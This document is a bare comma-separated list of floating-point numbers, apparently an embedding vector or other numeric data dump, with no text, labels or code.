-0.0008577935514040291, -0.01642770692706108, 0.006064923480153084, -0.03047436848282814, 0.04237958788871765, -0.016757158562541008, 0.022896958515048027, -0.026116609573364258, 0.023226410150527954, -0.004324065987020731, -0.017341189086437225, 0.0022818339057266712, -0.002910788869485259, 0.01276628952473402, -0.04971739649772644, -0.021489296108484268, 0.005507100373506546, -0.005750446114689112, -0.011411041021347046, 0.017805417999625206, 0.05304187536239624, 0.009501713328063488, 0.0406724251806736, -0.02521810121834278, -0.00375126744620502, -0.005196366459131241, -0.00741268415004015, -0.00764479860663414, -0.02340611256659031, 0.02319646067917347, 0.03384377062320709, -0.008745470084249973, -0.018733873963356018, 0.02138447016477585, 0.0032065475825220346, -0.0012214082526043057, -0.06067918613553047, -0.0031429033260792494, -0.032525960355997086, -0.009771266020834446, 0.013357806950807571, 0.030444419011473656, -0.007453865837305784, -0.0001082771341316402, 0.007203032728284597, 0.0024933575186878443, -0.007083231583237648, 0.011006712913513184, 0.010213031433522701, 0.005050359293818474, 0.006866092327982187, -0.02818317525088787, -0.01224964763969183, 0.017955169081687927, 0.004855682607740164, 0.015693925321102142, -0.026191484183073044, -0.0005690545658580959, -0.001944893621839583, 0.000008226078534789849, 0.029096657410264015, -0.02205835096538067, -0.030444419011473656, -0.0016079534543678164, 0.004735881462693214, -0.007334064692258835, -0.017251336947083473, -0.002190111204981804, 0.0012551022227853537, -0.012332011014223099, -0.013552483171224594, -0.016861984506249428, -0.0328853614628315, 0.0014656898565590382, -0.013148155063390732, 0.019677307456731796, 0.024424420669674873, -0.008416017517447472, 0.013589921407401562, 0.02340611256659031, -0.022282978519797325, -0.014533353969454765, -0.027104966342449188, 0.010070768184959888, -0.010617359541356564, -0.03126804903149605, 0.004500023555010557, -0.014630692079663277, 0.06103858724236488, -0.0017726797377690673, 0.0010959915816783905, -0.05100525915622711, -0.0016248004976660013, -0.003403095994144678, -0.005529562942683697, -0.0059151723980903625, -0.013672283850610256, -0.009681414812803268, 0.04899859055876732, -0.01004081778228283, 0.004619824234396219, 0.0005203853943385184, -0.019123228266835213, -0.004073232412338257, -0.020426062867045403, -0.008730494417250156, 0.0013861345360055566, -0.011463453993201256, -0.0374378003180027, 0.0016949963755905628, -0.015873627737164497, 0.02256750501692295, -0.013829522766172886, -0.0024521758314222097, 0.042409539222717285, 0.021624073386192322, -0.024214768782258034, 0.02521810121834278, 0.003376889508217573, -0.022028401494026184, -0.03827640414237976, -0.015124870464205742, -0.033005163073539734, -0.010467608459293842, 0.015049994923174381, -0.022717256098985672, -0.0073190899565815926, -0.03878555819392204, 0.012908552773296833, 0.017550840973854065, 0.00652540847659111, -0.012346985749900341, -0.02096516825258732, 0.0036052600480616093, 0.009374424815177917, -0.048339687287807465, 0.02891695685684681, -0.0068960427306592464, -0.005596951115876436, 0.005143953487277031, 0.008880245499312878, 0.0007581154350191355, 0.039085064083337784, -0.027104966342449188, 0.04789043217897415, 0.023750539869070053, -0.03603013604879379, -0.009224673733115196, -0.009449300356209278, 0.008648131974041462, -0.009666440077126026, 0.01242934912443161, 0.0026187740731984377, 0.008947634138166904, -0.02490362338721752, 0.03228635713458061, 0.025966856628656387, -0.013784597627818584, 0.019168153405189514, -0.011096564121544361, -0.009823678061366081, 0.004440122749656439, -0.022582480683922768, -0.00376998633146286, 0.032585859298706055, -0.00261315843090415, 0.0006411222857423127, -0.019213078543543816, -0.014600741676986217, -0.03656924143433571, 0.02595188282430172, 0.0209501925855875, 0.01987198367714882, -0.035281382501125336, 0.01084198709577322, -0.007936813868582249, 0.009134823456406593, 0.002794731641188264, 0.00755494786426425, -0.028108298778533936, -0.011837831698358059, 0.02313655987381935, -0.01928795501589775, 0.014802905730903149, -0.009456788189709187, -0.013020866550505161, 0.031178198754787445, 0.0214743223041296, 0.040642473846673965, -0.03588038682937622, -0.004219240043312311, -0.004043282475322485, -0.014982607215642929, -0.006338219624012709, 0.013859473168849945, -0.01773054152727127, -0.00531616760417819, 0.00033436634112149477, 0.00734529597684741, 0.0198120828717947, 0.0013430810067802668, -0.0037643706891685724, 0.002794731641188264, 0.011575767770409584, -0.02683541364967823, 0.010070768184959888, 0.004694700241088867, -0.027539245784282684, 0.0472315289080143, 0.055108439177274704, -0.0051589286886155605, -0.02117481827735901, -0.005091540515422821, -0.005836552940309048, -0.004163083154708147, -0.017401089891791344, -0.005147697404026985, 0.0067837294191122055, -0.027688996866345406, 0.01856914907693863, -0.01732621341943741, 0.03800685331225395, -0.019063327461481094, 0.026760539039969444, -0.00798173900693655, -0.0021975988056510687, -0.02942611090838909, 0.015192259103059769, 0.019692283123731613, 0.001587362727150321, -0.03255591168999672, -0.014211388304829597, -0.017595766112208366, -0.019317904487252235, -0.03327471762895584, -0.013410219922661781, -0.006989636924117804, -0.002236908534541726, 0.002620646031573415, -0.003725060960277915, 0.0018428756156936288, 0.0018363239942118526, -0.00760736083611846, 0.008460942655801773, -0.01955750584602356, 0.0025551298167556524, 0.0006004087044857442, 0.020785465836524963, -0.01328293140977621, -0.021294619888067245, -0.011568279936909676, -0.022238053381443024, 0.03794695436954498, -0.009980916976928711, -0.0123769361525774, -0.009134823456406593, -0.019018402323126793, 0.006233393680304289, -0.027703970670700073, -0.021489296108484268, -0.015192259103059769, -0.0439070500433445, 0.017086612060666084, 0.009172260761260986, -0.015327034518122673, 0.017356162890791893, 0.10075260698795319, -0.03186705335974693, 0.0009490482043474913, -0.011403553187847137, -0.013073279522359371, 0.009142310358583927, 0.01623302884399891, 0.007281651720404625, 0.0036969827488064766, -0.019572481513023376, 0.003798064775764942, 0.006828654557466507, 0.00521134166046977, 0.01970725692808628, 0.011695568449795246, 0.01867397502064705, -0.014353652484714985, -0.019198102876544, 0.024349544197320938, 0.010856961831450462, 0.02294188365340233, 0.01232452318072319, -0.012526687234640121, -0.013732184655964375, 0.02121974527835846, -0.0012382551794871688, -0.02168397419154644, -0.017505913972854614, -0.024678997695446014, 0.0017380497884005308, 0.015177283436059952, -0.017176462337374687, -0.012010046280920506, -0.01313318032771349, 0.0018353881314396858, 0.013874447904527187, 0.01633785478770733, 0.006989636924117804, -0.019512580707669258, -0.024828748777508736, -0.00808656495064497, -0.02824307605624199, -0.01955750584602356, -0.0028602478560060263, 0.0126614635810256, -0.02006665989756584, 0.015559148974716663, 0.015678949654102325, -0.022971833124756813, 0.00741268415004015, -0.016936860978603363, -0.0035191532224416733, 0.01461571641266346, 0.010654797777533531, 0.027629096060991287, 0.003558462718501687, -0.022657355293631554, 0.0013309137430042028, -0.00512149091809988, -0.007936813868582249, 0.0008596654515713453, -0.006117336452007294, -0.003646441735327244, 0.004492535721510649, -0.013679771684110165, 0.0007412684499286115, -0.024798797443509102, 0.009307037107646465, -0.014398577623069286, 0.03432297334074974, 0.014802905730903149, 0.004821988753974438, -0.00954663846641779, 0.00782450009137392, -0.0018625304801389575, -0.02735954336822033, -0.011141489259898663, 0.014001736417412758, -0.02027631178498268, -0.010370270349085331, -0.008842808194458485, 0.013851985335350037, -0.0017717438749969006, 0.019422730430960655, 0.004485048353672028, 0.01918312907218933, -0.03692864626646042, -0.004462585784494877, 0.0020478477235883474, -0.0024166100192815065, -0.005338630173355341, -0.003053052583709359, 0.016966810449957848, -0.017026711255311966, 0.011306215077638626, 0.030818795785307884, -0.008655618876218796, -0.014817880466580391, -0.015678949654102325, -0.014555816538631916, 0.022028401494026184, 0.00787691306322813, 0.0015218465123325586, -0.006510433275252581, -0.018344521522521973, -0.007094462867826223, -0.003189700422808528, -0.0005615669651888311, -0.001547117019072175, -0.01260905060917139, 0.004522486124187708, 0.003494818462058902, 0.011246315203607082, -0.007996713742613792, -0.012863627634942532, 0.003691367106512189, -0.007098206784576178, 0.011156463995575905, -0.005596951115876436, -0.034352924674749374, -0.03072894550859928, -0.0024559195153415203, 0.021489296108484268, -0.04270904138684273, 0.008737982250750065, 0.022432729601860046, 0.033065065741539, -0.04264914244413376, 0.01507994532585144, 0.00983116589486599, 0.013223030604422092, 0.012601562775671482, 0.011950145475566387, 0.010250469669699669, 0.012279598042368889, -0.00956910103559494, 0.016712233424186707, 0.011126513592898846, -0.01970725692808628, 0.017655666917562485, -0.001784847117960453, 0.010415195487439632, 0.002444688230752945, 0.01960243098437786, -0.001249486580491066, 0.011957633309066296, -0.0016631742473691702, 0.016682283952832222, 0.0018934167455881834, 0.007944300770759583, 0.008910195901989937, -0.029201483353972435, -0.008019176311790943, 0.03641949221491814, 0.015798751264810562, -0.01898845098912716, 0.00736027117818594, -0.009861116297543049, -0.0020852854941040277, 0.00499420240521431, -0.0026599555276334286, 0.009771266020834446, 0.0009045908227562904, -0.013552483171224594, 0.0019140074728056788, 0.027524270117282867, -0.0021882392466068268, -0.019018402323126793, -0.002120851306244731, 0.012421861290931702, 0.022612430155277252, -0.006802448071539402, -0.03114824928343296, -0.002935123397037387, 0.001445099012926221, 0.044086750596761703, -0.003930968698114157, 0.011515866965055466, 0.024454370141029358, -0.01251171249896288, 0.007510022725909948, 0.0033413234632462263, 0.018419397994875908, 0.011530841700732708, -0.005203854292631149, 0.0027909879572689533, 0.0034854591358453035, 0.009711365215480328, -0.02942611090838909, 0.010153131559491158, 0.014937682077288628, 0.019991785287857056, -0.013500070199370384, -0.02048596367239952, 0.013971786946058273, -0.02942611090838909, -0.006888554897159338, -0.0258919820189476, 0.010782086290419102, -0.015379447489976883, -0.011620692908763885, -0.003637082176283002, -0.0016322880983352661, 0.01581372693181038, 0.01022051926702261, -0.03935461491346359, -0.01297594141215086, 0.011268777772784233, 0.006903530098497868, 0.018015068024396896, -0.0005189814837649465, 0.004773319233208895, 0.008438480086624622, -0.0033375797793269157, 0.03186705335974693, 0.009606539271771908, 0.0029238921124488115, -0.019467655569314957, 0.006705109961330891, 0.0038860435597598553, -0.0033862488344311714, 0.004372735042124987, 0.005611926317214966, 0.009254624135792255, -0.02345103770494461, 0.012968453578650951, 0.006079898681491613, -0.019123228266835213, 0.010819523595273495, 0.0021620329935103655, -0.029456060379743576, -0.011096564121544361, -0.0020122816786170006, 0.0032233945094048977, -0.005735470913350582, -0.004084463696926832, 0.012953478842973709, -0.00492681423202157, 0.00097806251142174, 0.026071682572364807, 0.008124002255499363, -0.003144775051623583, -0.02428964339196682, -0.0033169889356940985, 0.004612336866557598, -0.0002824213879648596, 0.013230518437922001, 0.01930292882025242, -0.0032945263665169477, -0.002583208028227091, -0.004099438898265362, -0.003215906908735633, 0.004975483287125826, -0.02225302718579769, -0.011321190744638443, -0.001504063606262207, -0.009344474412500858, -0.016757158562541008, -0.028512628749012947, -0.01235447358340025, 0.03375392034649849, -0.027584170922636986, -0.0034910747781395912, 0.017281288281083107, -0.05037630349397659, 0.023900290951132774, -0.02683541364967823, -0.001756768673658371, -0.0006968110101297498, -0.018898600712418556, -0.00025949074188247323, 0.006750035099685192, 0.0072105200961232185, -0.0056381323374807835, -0.010564946569502354, -0.0014432271709665656, 0.0030099989380687475, -0.006660184357315302, -0.0034648682922124863, 0.010370270349085331, -0.007891887798905373, 0.050466153770685196, 0.014413552358746529, -0.025622429326176643, 0.006663928274065256, 0.003410583594813943, -0.032106656581163406, 0.004346528556197882, -0.02578715607523918, -0.0030624119099229574, -0.004799525719136, -0.021773824468255043, 0.017236363142728806, -0.014241338707506657, 0.015229696407914162, -0.0005924531724303961, -0.0009874219540506601, 0.024843722581863403, 0.020740540698170662, -0.009928504005074501, 0.022807106375694275, 0.029935264959931374, 0.012414374388754368, 0.009351962246000767, 0.001156828016974032, 0.008026664145290852, -0.02006665989756584, -0.01623302884399891, -0.0034910747781395912, 0.010183081030845642, -0.0030549243092536926, -0.020620739087462425, -0.04124147817492485, -0.0011774187441915274, 0.008737982250750065, -0.000817547959741205, -0.013223030604422092, 0.007300370838493109, -0.01731123775243759, 0.030848747119307518, -0.0033881207928061485, -0.01711656153202057, -0.04055262356996536, 0.00307551515288651, -0.017610739916563034, -0.00010096506593981758, -0.01716148667037487, 0.02220810204744339, -0.0017034198390319943, -0.030219791457057, 0.0290816817432642, 0.0006341027328744531, 0.027913622558116913, -0.0037887052167207003, -0.017490940168499947, 0.000854517740663141, 0.012549150735139847, -0.0001915177417686209, 0.016682283952832222, -0.00753997266292572, -0.026505962014198303, 0.020770490169525146, -0.0010323473252356052, 0.005342374090105295, 0.018059995025396347, -0.007214264012873173, -0.003506049979478121, 0.016577458009123802, -0.012474274262785912, -0.032795511186122894, -0.02689531445503235, 0.008655618876218796, 0.005529562942683697, 0.011433503590524197, -0.0018307083519175649, 0.027104966342449188, 0.004080720245838165, 0.017131537199020386, 0.02324138581752777, -0.0019224309362471104, -0.022088302299380302, -0.003998356871306896, 0.012257135473191738, 0.0055520255118608475, 0.018853675574064255, -0.022657355293631554, -0.007989225909113884, -0.00400210078805685, 0.011643155477941036, 0.027284668758511543, 0.017910243943333626, -0.002210702048614621, 0.0062221623957157135, -0.018134869635105133, 0.011950145475566387, 0.00194676558021456, 0.01232452318072319, -0.020605765283107758, -0.014458478428423405, 0.020815417170524597, -0.0013355935225263238, -0.005694289226084948, 0.005170159973204136, 0.00024498358834534883, 0.0007328449282795191, -0.0014479068340733647, -0.0013664796715602279, -0.020830390974879265, -0.009584076702594757, -0.005645620170980692, 0.023076659068465233, 0.011538329534232616, 0.008655618876218796, 0.022956859320402145, -0.008962608873844147, 0.009599051438272, -0.015559148974716663, 0.020036710426211357, -0.02668566256761551, 0.00944181252270937, 0.0029145325534045696, -0.028946906328201294, 0.009636489674448967, 0.021624073386192322, 0.008625668473541737, -0.004911839030683041, -0.037467747926712036, -0.009449300356209278, 0.054479483515024185, -0.019692283123731613, 0.015514223836362362, -0.005630644969642162, -0.018688948825001717, -0.025053374469280243, -0.031058399006724358, -0.00813897792249918, 0.013582433573901653, 0.028767205774784088, 0.019991785287857056, -0.012436836957931519, 0.007944300770759583, 0.0009167580865323544, -0.004807013552635908, -0.04753103107213974, -0.014413552358746529, -0.017386114224791527, -0.036479391157627106, 0.003210291266441345, -0.006903530098497868, 0.013687259517610073, -0.010332832112908363, -0.0033095013350248337, 0.0002580868313089013, -0.01877880096435547, -0.005166416056454182, 0.0159185528755188, 0.00048201167373917997, 0.0062820627354085445, -0.02786869741976261, 0.016562482342123985, -0.00030698993941769004, 0.001744601409882307, 0.02163904719054699, -0.004234215244650841, 0.0022574993781745434, 0.003655801061540842, -0.0318371057510376, 0.00373254856094718, -0.01500506978482008, -0.0159185528755188, 0.02626636065542698, -0.01310322992503643, 0.011703056283295155, 0.004065745044499636, 0.0042566778138279915, -0.005510843824595213, 0.004765831865370274, 0.007068256381899118, 0.0009158221655525267, -0.013604896143078804, 0.026401136070489883, -0.012099896557629108, -0.000869960873387754, -0.017760490998625755, 0.019632382318377495, 0.004619824234396219, 0.010310369543731213, -0.010564946569502354, -0.0291266068816185, -0.001454458455555141, 0.02183372527360916, -0.0007801101310178638, 0.013747159391641617, 0.0062483688816428185, 0.011126513592898846, -0.0072629330679774284, -0.014338676817715168, -0.02044103853404522, 0.017655666917562485, 0.013874447904527187, 0.01196512021124363, 0.03309501335024834, -0.004773319233208895, 0.003786833491176367, -0.0014797289622947574, -0.010332832112908363, 0.0023960191756486893, -0.00369885447435081, -0.00048013977357186377, -0.007030818611383438, -0.008708031848073006, -0.031387850642204285, -0.003614619607105851, -0.00200853799469769, 0.009793728590011597, 0.00024685548851266503, -0.0036333384923636913, 0.01279623992741108, 0.025442728772759438, -0.013672283850610256, 0.0006261472008191049, -0.010235494002699852, -0.007030818611383438, -0.01507994532585144, 0.01263900101184845, 0.00010546929843258113, -0.0035191532224416733, -0.001844747574068606, 0.023585813120007515, -0.00956910103559494, 0.005817833822220564, -0.007214264012873173, 0.0012026892509311438, 0.008101539686322212, 0.010355295613408089, 0.013582433573901653, 0.006641465704888105, 0.005724239628762007, -0.00762982340529561, 0.002583208028227091, -0.0052450355142354965, 0.005050359293818474, 0.023286310955882072, -0.02065069042146206, 0.0018316443311050534, -0.0016556866466999054, -0.00017385177488904446, -0.00625585624948144, -0.006038716994225979, -0.017925217747688293, 0.013095742091536522, 0.021084968000650406, -0.007105694152414799, -0.027314618229866028, 0.011163951829075813, -0.015169796533882618, 0.041630834341049194, -0.0030867464374750853, -0.008019176311790943, -0.011306215077638626, -0.006139799021184444, 0.0010286035249009728, -0.005971328821033239, 0.00634570699185133, -0.0039796382188797, -0.006641465704888105, 0.013350319117307663, -0.014600741676986217, -0.019108252599835396, 0.004578643012791872, 0.019198102876544, 0.025307951495051384, 0.002513948129490018, -0.0025289233308285475, -0.0024334569461643696, -0.007757111918181181, -0.015978451818227768, -0.003867324674502015, 0.00780203752219677, 0.00035074539482593536, -0.003479843493551016, 0.014585766941308975, 0.024933574721217155, 0.009254624135792255, -0.0019355341792106628, 0.001315938658080995, 0.00032804871443659067, -0.032945264130830765, -0.004859426524490118, -0.02168397419154644, 0.009434325620532036, 0.007034562528133392, -0.0007918094634078443, -0.0008999111014418304, -0.002751678228378296, 0.0018784415442496538, 0.004908095579594374, -0.0027385749854147434, -0.007292883470654488, 0.008835320360958576, -0.0056381323374807835, 0.008895221166312695, -0.01701173558831215, -0.009898554533720016, -0.008401041850447655, 0.0030811307951807976, 0.0020572070498019457, -0.011426016688346863, -0.019198102876544, -0.0047321380116045475, 0.016292929649353027, -0.0017436655471101403, -0.02216317690908909, 0.023016758263111115, -0.019632382318377495, -0.0025813363026827574, -0.024723922833800316, 0.003567822277545929, 0.002399762859568, 0.019048351794481277, 0.01289357803761959, 0.019437706097960472, -0.000697278999723494, 0.0024222256615757942, -0.010714697651565075, -0.027314618229866028, 0.011815369129180908, -0.014293751679360867, -0.009786240756511688, -0.006285806652158499, 0.00384111818857491, -0.0007408004603348672, -0.004668493755161762, 0.0131855932995677, -0.004765831865370274, -0.013380269519984722, -0.013859473168849945, 0.00007072234438965097, -0.014623204246163368, -0.025966856628656387, 0.00983116589486599, -0.0074089402332901955, 0.01055745966732502, -0.007480072323232889, 0.01004081778228283, -0.007356527727097273, 0.0003367062017787248, -0.007637311238795519, -0.013814548030495644, 0.01987198367714882, -0.0016453912248834968, -0.008775420486927032, 0.00736027117818594, -0.009898554533720016, -0.015439348295331001, 0.026745563372969627, -0.0060873860493302345, 0.007352783810347319, -0.019857008010149002, -0.007831987924873829, 0.009554126299917698, -0.0005320847267284989, -0.01819477044045925, -0.01232452318072319, -0.022268002852797508, 0.010707210749387741, 0.0037887052167207003, 0.0021975988056510687, -0.007113181985914707, 0.030564218759536743, -0.0126614635810256, -0.004814500920474529, -0.02199845016002655, -0.005911428481340408, 0.013777109794318676, -0.0033095013350248337, -0.01461571641266346, 0.006985893473029137, 0.013522532768547535, 0.01287111546844244, 0.004679725039750338, 0.02673058770596981, -0.01632288098335266, 0.004500023555010557, -0.0037718582898378372, -0.01768561638891697, -0.01502753235399723, 0.002139570191502571, -0.0021508014760911465, 0.017401089891791344, 0.005065334029495716, 0.0077720871195197105, -0.020246362313628197, -0.016143178567290306, -0.00041813342249952257, -0.013844498433172703, 0.0048444513231515884, 0.003960919100791216, -0.0026842902880162, 0.0032458570785820484, -0.020036710426211357, -0.01008574292063713, -0.006832398474216461, -0.005986304022371769, 0.021040042862296104, 0.002175136236473918, -0.003953431732952595, -0.002577592385932803, -0.0007258253172039986, -0.01779044233262539, 0.012489249929785728, 0.01898845098912716, 0.0018026300240308046, -0.0007838539313524961, -0.011980095878243446, -0.033933620899915695, -0.010198056697845459, 0.019737208262085915, -0.02668566256761551, 0.017670640721917152, 0.014391089789569378, 0.010946812108159065, -0.0063943760469555855, -0.009179748594760895, -0.008131490088999271, 0.005866503342986107, 0.010699722915887833, 0.007285395637154579, 0.018524223938584328, -0.0017464733682572842, 0.0001878909533843398, -0.0020141536369919777, 0.0160084031522274, 0.007869425229728222, -0.0046834684908390045, 0.01846432313323021, -0.00474711274728179, 0.007034562528133392, 0.01850924827158451, 0.004780807066708803, -0.02439446933567524, 0.0014675616985186934, 0.008438480086624622, -0.022447705268859863, 0.00816144049167633, 0.003350683022290468, 0.027329593896865845, -0.00261315843090415, -0.028302976861596107, -0.01305081695318222, 0.010018355213105679, 0.004866913892328739, 0.025562528520822525, -0.019857008010149002, -0.000023939717721077614, -0.012983428314328194, 0.018434371799230576, -0.039594218134880066, -0.00008236315625254065, -0.035970237106084824, 0.019048351794481277, 0.017191438004374504, -0.0008503060089424253, -0.00780203752219677, 0.005162672605365515, 0.004982971120625734, 0.004908095579594374, -0.007090718951076269, -0.0015480529982596636, 0.005776652600616217, -0.014136512763798237, 0.017985118553042412, -0.009366936981678009, 0.007573666982352734, 0.020216410979628563, -0.00995845440775156, -0.008026664145290852, 0.009861116297543049, 0.0012953478144481778, 0.009816191159188747, 0.008693057112395763, 0.018015068024396896, -0.0016285442980006337, 0.018748849630355835, 0.011740493588149548, 0.006619002670049667, 0.012579100206494331, 0.011890244670212269, 0.00011740259651560336, -0.015349498018622398, -0.023540887981653214, 0.013515045866370201, 0.01913820207118988, 0.0005143017624504864, 0.013687259517610073, 0.030459392815828323, 0.0039496878162026405, -0.018808750435709953, 0.014421040192246437, -0.024529246613383293, -0.0030811307951807976, -0.012107384391129017, -0.02481377311050892, 0.0005681185866706073, 0.04633301869034767, 0.014106562361121178, -0.017700592055916786, -0.005110259633511305, 0.009434325620532036, -0.021399445831775665, 0.001142788794822991, -0.013200568035244942, 0.02214820124208927, -0.01898845098912716, -0.0049867150373756886, -0.018164820969104767, 0.01305081695318222, 0.006409351248294115, 0.0023005527909845114, -0.001223280094563961, -0.01305081695318222, -0.03543113172054291, -0.007809524890035391, -0.010048305615782738, 0.014480940997600555, 0.003382505150511861, 0.01495265681296587, 0.012062459252774715, -0.002570105018094182, 0.000599940714892, -0.023256361484527588, -0.011568279936909676, -0.015589099377393723, 0.004013332072645426, 0.005409761797636747, 0.009808703325688839, 0.0005372324376367033, -0.019213078543543816, 0.027629096060991287, 0.003934712614864111, 0.0047321380116045475, -0.013088254258036613, 0.014458478428423405, -0.004810757003724575, 0.006922249216586351, -0.019587457180023193, -0.01773054152727127, -0.03345441818237305, 0.01570890098810196, -0.01659243181347847, -0.00831867940723896, 0.0006425262545235455, 0.0035322564654052258, -0.003296398324891925, -0.02391526661813259, -0.01758079044520855, 0.004462585784494877, -0.0038560933899134398, 0.0041967774741351604, -0.005364836659282446, -0.02927635982632637, 0.00004416490264702588, -0.010392732918262482, 0.007337808609008789, -0.02860247902572155, -0.022702282294631004, 0.0052712420001626015, -0.011455966159701347, -0.006637721788138151, -0.02168397419154644, 0.007139388471841812, 0.000008006716598174535, -0.006839885842055082, 0.01800009422004223, 0.020530888810753822, 0.011358628049492836, 0.00666767219081521, -0.02521810121834278, -0.014525866135954857, 0.0016706617316231132, 0.014196413569152355, 0.012616538442671299, 0.02771894633769989, -0.02018646150827408, -0.007809524890035391, -0.0041967774741351604, -0.005589463282376528, -0.010257956571877003, -0.014129025861620903, -0.01557412464171648, 0.022552529349923134, -0.00805661454796791, -0.0051589286886155605, 0.031118297949433327, 0.011208876967430115, -0.023226410150527954, -0.008895221166312695, -0.006072410847991705, -0.033664070069789886, 0.012601562775671482, 0.011740493588149548, -0.0024409445468336344, -0.02199845016002655, 0.01835949718952179, 0.002630005357787013, 0.002199470764026046, 0.00974880252033472, 0.008288729004561901, 0.005694289226084948, -0.014091587625443935, -0.018030043691396713, 0.01201753318309784, -0.03354426845908165, 0.016832035034894943, 0.030309641733765602, -0.0022125740069895983, -0.0015199746703729033, -0.00739770894870162, 0.008535818196833134, 0.01705666072666645, -0.011478429660201073, 0.009172260761260986, -0.0021171076223254204, 0.02626636065542698, 0.010752135887742043, -0.0006748163141310215, -0.005065334029495716, -0.008887733332812786, 0.009943479672074318, -0.005304936319589615, 0.014406065456569195, 0.011770443990826607, 0.009763778187334538, 0.010310369543731213, 0.005054102744907141, -0.001837259973399341, -0.001841939752921462, -0.009104873053729534, 0.004440122749656439, 0.003506049979478121, 0.0011867781868204474, -0.0035902848467230797, -0.01240688655525446, -0.0054060183465480804, -0.002289321506395936, -0.010774598456919193, 0.018524223938584328, -0.008490893058478832, -0.014660642482340336, 0.0197671577334404, 0.014166463166475296, 0.006697622127830982, -0.00029622658621519804, 0.011905220337212086, -0.026640737429261208, 0.02183372527360916, -0.007461353205144405, -0.0003011403023265302, 0.0011128386249765754, -0.012062459252774715, -0.021594122052192688, 0.010767110623419285, 0.0059189158491790295, -0.02370561473071575, -0.017670640721917152, -0.024050042033195496, -0.00773464934900403, 0.01019056886434555, 0.020246362313628197, 0.01221969723701477, 0.0003640826034825295, 0.005653107538819313, -0.030669044703245163, -0.001556476461701095, -0.03510168194770813, 0.010976762510836124, -0.016936860978603363, 0.014009224250912666, 0.0019046480301767588, -0.013874447904527187, -0.013672283850610256, 0.00488937646150589, 0.008610693737864494, 0.009816191159188747, 0.008198877796530724, 0.01328293140977621, -0.03318486362695694, -0.0028565041720867157, 0.001735241967253387, 0.005207597743719816, 0.008101539686322212, 0.010549971833825111, 0.0019046480301767588, -0.012309548445045948, 0.019048351794481277, 0.01690690964460373, -0.010070768184959888, -0.0010529380524531007, -0.02605670876801014, 0.009262111969292164, -0.013784597627818584, -0.005147697404026985, -0.019961833953857422, 0.013709722086787224, -0.01276628952473402, -0.011658130213618279, -0.007936813868582249, 0.006312013138085604, 0.016787109896540642, -0.0192430280148983, -0.011905220337212086, -0.016712233424186707, 0.013530020602047443, -0.011396066285669804, 0.016292929649353027, -0.008887733332812786, 0.027943573892116547, -0.009868604131042957, -0.010055792517960072, -0.013552483171224594, 0.007921838201582432, -0.013417706824839115, -0.0049867150373756886, 0.022223077714443207, -0.0004335764970164746, -0.0025813363026827574, 0.0030231021810323, 0.005567000713199377, 0.00033343039103783667, -0.0009045908227562904, 0.011777931824326515, 0.008079077117145061, -0.013822035863995552, 0.01820974610745907, 0.0011175182880833745, 0.004896864295005798, -0.019422730430960655, 0.012279598042368889, 0.006237137131392956, -0.01546929869800806, -0.018644023686647415, 0.017101585865020752, 0.013919373974204063, -0.005533306859433651, -0.03114824928343296, 0.0011820985237136483, -0.014076612889766693, -0.02075551636517048, 0.018898600712418556, 0.0054921251721680164, 0.01479541789740324, 0.009426837787032127, 0.0059189158491790295, 0.016712233424186707, -0.0034386618062853813, 0.005054102744907141, -0.005705520510673523, 0.011283752508461475, 0.002469022758305073, 0.006094873882830143, 0.004833220038563013, -0.005510843824595213, -0.041211530566215515, 0.015723874792456627, -0.009456788189709187, -0.004219240043312311, -0.01747596450150013, -0.005698033142834902, 0.015049994923174381, 0.008775420486927032, -0.01531954761594534, 0.0098835788667202, -0.023166509345173836, -0.018329545855522156, -0.012736339122056961, 0.0036595449782907963, 0.012294572778046131, 0.024948548525571823, 0.020740540698170662, 0.010370270349085331, -0.019677307456731796, -0.011830344796180725, 0.0011914579663425684, 0.0010744648752734065, 0.003942200448364019, -0.005248779430985451, -0.012212210334837437, 0.0026899059303104877, -0.007034562528133392, 0.02084536664187908, 0.018269646912813187, 0.020261336117982864, -0.01638278178870678, -0.01024298183619976, -0.002978176809847355, -0.004728394094854593, -0.022612430155277252, -0.014750492759048939, 0.014106562361121178, -0.012519200332462788, -0.018958501517772675, -0.005087797064334154, 0.018703924492001534, 0.0029332516714930534, 0.01768561638891697, -0.003796192817389965, -0.011246315203607082, 0.002534538973122835, 0.013013378717005253, 0.011927682906389236, -0.010018355213105679, -0.007109438069164753, -0.004380222409963608, -0.005117747001349926, 0.004290371667593718, -0.017700592055916786, 0.023885315284132957, 0.0012738211080431938, 0.033873721957206726, -0.025817105546593666, -0.02115984447300434, 0.01602337881922722, 0.011426016688346863, 0.02788367308676243, -0.006937223952263594, -0.0005844976403750479, -0.027524270117282867, -0.004047025926411152, -0.001797014381736517, -0.00022427582007367164, 0.0014357395702973008, -0.0018176051089540124, -0.014181437902152538, 0.011381090618669987, -0.011590742506086826, -0.0041705709882080555, -0.008902708999812603, -0.0209052674472332, -0.006581564899533987, -0.038306355476379395, -0.00625585624948144, -0.017805417999625206, 0.013140667229890823, -0.011792906560003757, 0.022507604211568832, -0.025667354464530945, 0.010445145890116692, -0.0003250068984925747, 0.03495192900300026, -0.009711365215480328, 0.01253417506814003, -0.028332926332950592, -0.02689531445503235, -0.0005498676910065114, 0.012391911819577217, -0.01808994449675083, -0.011485916562378407, -0.01263900101184845, -0.009816191159188747, 0.023361187428236008, -0.0065291523933410645, 0.0008404785767197609, 0.0021770079620182514, -0.012908552773296833, -0.01255663763731718, 0.013762135058641434, -0.011957633309066296, -0.007966763339936733, 0.027659045532345772, 0.0027816283982247114, -0.030204815790057182, 0.0006387824541889131, 0.011957633309066296, 0.004765831865370274, 0.0009630873682908714, 0.014406065456569195, -0.006289550103247166, 0.015783775597810745, 0.030099989846348763, 0.004653518553823233, -0.009000047110021114, 0.008094051852822304, 0.008176415227353573, -0.0019505093805491924, -0.0014245082857087255, 0.003549103392288089, 0.01245929952710867, 0.016083277761936188, -0.0129459910094738, -0.000016130426956806332, 0.005589463282376528, 0.0014142128638923168, 0.013619870878756046, 0.030444419011473656, -0.0001406257360940799, 0.002699265256524086, 0.002515820087864995, -0.006207187194377184, -0.011837831698358059, 0.00017209688667207956, -0.015993427485227585, -0.019272979348897934, -0.02387034147977829, -0.00019537851039785892, -0.009336987510323524, -0.0016369677614420652, 0.006147286389023066, 0.00990604143589735, 0.01536447275429964, 0.002315527992323041, -0.016817059367895126, 0.0003643165691755712, -0.021354520693421364, 0.0028190661687403917, 0.009329499676823616, -0.024559196084737778, -0.010467608459293842, 0.004702187608927488, 0.0329752117395401, 0.01525964681059122, -0.005945122335106134, 0.014046662487089634, 0.006390632130205631, 0.011508379131555557, -0.005784139968454838, -0.01258658803999424, -0.004953020717948675, -0.003908506128937006, 0.0038860435597598553, 